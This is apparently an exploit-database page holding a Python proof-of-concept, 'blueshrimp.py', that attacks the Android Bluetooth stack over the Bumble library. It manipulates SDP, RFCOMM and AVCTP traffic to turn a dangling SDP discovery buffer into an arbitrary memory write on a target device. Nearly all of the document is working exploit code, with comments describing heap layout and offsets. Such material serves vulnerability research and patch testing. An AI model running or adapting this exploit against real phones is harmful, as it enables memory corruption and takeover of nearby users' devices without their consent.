4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / blueshrimp.py PY
import asyncio
import struct

import bumble.logging
from bumble import core, hci, rfcomm, transport, utils, hfp, sdp, avrcp, l2cap
from bumble.colors import color
from bumble.device import Connection, Device, DeviceConfiguration
from bumble.l2cap import ClassicChannelSpec

hci_transport = "android-netsim"
device_config = "device.json"
address = "DA:4C:10:DE:17:00"

# copied from Bumble's examples/run_hfp_gateway.py


def _default_configuration() -> hfp.AgConfiguration:
    return hfp.AgConfiguration(
        supported_ag_features=[
            hfp.AgFeature.HF_INDICATORS,
            hfp.AgFeature.IN_BAND_RING_TONE_CAPABILITY,
            hfp.AgFeature.REJECT_CALL,
            hfp.AgFeature.CODEC_NEGOTIATION,
            hfp.AgFeature.ESCO_S4_SETTINGS_SUPPORTED,
            hfp.AgFeature.ENHANCED_CALL_STATUS,
        ],
        supported_ag_indicators=[
            hfp.AgIndicatorState.call(),
            hfp.AgIndicatorState.callsetup(),
            hfp.AgIndicatorState.callheld(),
            hfp.AgIndicatorState.service(),
            hfp.AgIndicatorState.signal(),
            hfp.AgIndicatorState.roam(),
            hfp.AgIndicatorState.battchg(),
        ],
        supported_hf_indicators=[
            hfp.HfIndicator.ENHANCED_SAFETY,
            hfp.HfIndicator.BATTERY_LEVEL,
        ],
        supported_ag_call_hold_operations=[],
        supported_audio_codecs=[hfp.AudioCodec.CVSD, hfp.AudioCodec.MSBC],
    )


def AvctMakePacket(transaction_label, packet_type, is_command, ipid, pid,
                   payload):
    return (struct.pack(
        ">BH",
        transaction_label << 4
        | packet_type << 2
        | (0 if is_command else 1) << 1
        | (1 if ipid else 0),
        pid,
    ) + payload)


async def main():
    bumble.logging.setup_basic_logging("INFO")
    async with await transport.open_transport(hci_transport) as (
            hci_source,
            hci_sink,
    ):
        device = Device.from_config_file_with_hci(device_config, hci_source,
                                                  hci_sink)
        device.classic_enabled = True
        configuration = _default_configuration()

        ag_sdp_record_handle = 0x00010001
        avrcp_controller_service_record_handle = 0x00010002
        avrcp_target_service_record_handle = 0x00010003

        device.sdp_service_records = {
            ag_sdp_record_handle:
            hfp.make_ag_sdp_records(1, ag_sdp_record_handle, configuration),
            avrcp_controller_service_record_handle:
            avrcp.make_controller_service_sdp_records(
                avrcp_controller_service_record_handle),
            avrcp_target_service_record_handle:
            avrcp.make_target_service_sdp_records(
                avrcp_controller_service_record_handle),
        }

        requests: list[sdp.SDP_ServiceSearchAttributeRequest] = []
        sdp_connections: list[l2cap.ClassicChannel] = []
        multiple_sdp_connections = True  # True for Android <=12L

        await device.power_on()
        connection = await device.connect(
            address, transport=core.PhysicalTransport.BR_EDR)
        await connection.authenticate()
        await connection.encrypt()

        hfp_record = await hfp.find_hf_sdp_record(connection)
        if hfp_record is None:
            print("target device doesn't support Headset Client")
            return
        hfp_channel_id = hfp_record[0]

        avrcp_protocol = avrcp.Protocol()
        avrcp_protocol.listen(device)
        await avrcp_protocol.connect(connection)

        def avctp_on_message_hook(
            transaction_label: int,
            is_command: bool,
            ipid: bool,
            pid: int,
            payload: bytes,
        ):
            print(transaction_label, is_command, ipid, pid, payload)

        don_t_have_a2dp = True
        if don_t_have_a2dp:
            avrcp_protocol.avctp_protocol.orig_on_message = avrcp_protocol.avctp_protocol.on_message
            avrcp_protocol.avctp_protocol.on_message = avctp_on_message_hook

        # TODO(zhuowei): wait for EVENT_CONNECTION instead
        await asyncio.sleep(1)

        def my_hook(request_):
            print("got SDP, doing NOTHING", request_)
            requests.append(request_)
            if multiple_sdp_connections:
                sdp_connections.append(device.sdp_server.channel)

        device.sdp_server.orig_on_sdp_service_search_attribute_request = device.sdp_server.on_sdp_service_search_attribute_request
        device.sdp_server.on_sdp_service_search_attribute_request = my_hook

        rfcomm_client = rfcomm.Client(connection)
        rfcomm_mux = await rfcomm_client.start()

        async def do_write(target_address, target_buffer):
            requests.clear()
            sdp_connections.clear()
            channel = await rfcomm_mux.open_dlc(hfp_channel_id)
            print("open dlc!!!!!!!")
            await asyncio.sleep(0.5)
            await channel.disconnect()
            await asyncio.sleep(0.5)
            channel = await rfcomm_mux.open_dlc(hfp_channel_id)
            await asyncio.sleep(0.5)
            sdp_response = sdp.SDP_ErrorResponse(
                transaction_id=requests[0].transaction_id,
                error_code=sdp.SDP_INVALID_SERVICE_RECORD_HANDLE_ERROR,
            )
            if multiple_sdp_connections:
                sdp_connections[0].send_pdu(sdp_response)
            else:
                device.sdp_server.send_response(sdp_response)
            await asyncio.sleep(0.5)
            # now p_disc_db is dangling: realloc it using avct_lcb_msg_asmbl
            # we don't control the first 0x13 bytes; with 0xef as my filler:
            # 0000  00 00 02 01 0b 01 01 00 19 00 07 01 03 01 75 00   ..............u.
            # 0010  06 06 41 ef ef ef ef ef ef ef ef ef ef ef ef ef   ..A.............
            buf_offset = 0x13
            tSDP_DISCOVERY_DB_raw_data_offset = 0x70
            # raw_data, raw_size, raw_used
            avrcp_command_buf = b"A" * (
                tSDP_DISCOVERY_DB_raw_data_offset - buf_offset) + struct.pack(
                    "<QII", target_address, 0x41414141, 0x0) + b"\xef" * 0x80
            avrcp_protocol.avctp_protocol.l2cap_channel.send_pdu(
                AvctMakePacket(0, avrcp.Protocol.PacketType.START, False,
                               False, 0x4141, avrcp_command_buf))

            if len(requests) == 2 and "AudioSource" in str(requests[1]):
                print("end audiosource")
                sdp_response = sdp.SDP_ErrorResponse(
                    transaction_id=requests[1].transaction_id,
                    error_code=sdp.SDP_INVALID_SERVICE_RECORD_HANDLE_ERROR,
                )
                if multiple_sdp_connections:
                    sdp_connections[1].send_pdu(sdp_response)
                else:
                    device.sdp_server.send_response(sdp_response)
            await asyncio.sleep(0.5)

            # now p_disc_db is overwritten with our avrcp packet
            # send sdp response, and sdp_copy_raw_data will do arbitrary memcpy
            sdp_attribute_list = bytes(
                sdp.DataElement.sequence([target_buffer]))
            sdp_response = sdp.SDP_ServiceSearchAttributeResponse(
                transaction_id=requests[-1].transaction_id,
                attribute_lists_byte_count=len(sdp_attribute_list),
                attribute_lists=sdp_attribute_list,
                continuation_state=bytes([0]))
            if multiple_sdp_connections:
                sdp_connections[-1].send_pdu(sdp_response)
            else:
                device.sdp_server.send_response(sdp_response)
            await asyncio.sleep(0.5)
            # clean up: free avrcp packet, close rfcomm channel
            avrcp_protocol.avctp_protocol.send_response(0, 0x4141, b"A")
            await channel.disconnect()
            await asyncio.sleep(0.5)

        # 76ccc61000-76d0c61000 rw-s 00000000 00:01 5731                           /memfd:jit-cache (deleted)
        await do_write(0x41414141_41414141, b"A" * 0x100)


asyncio.run(main())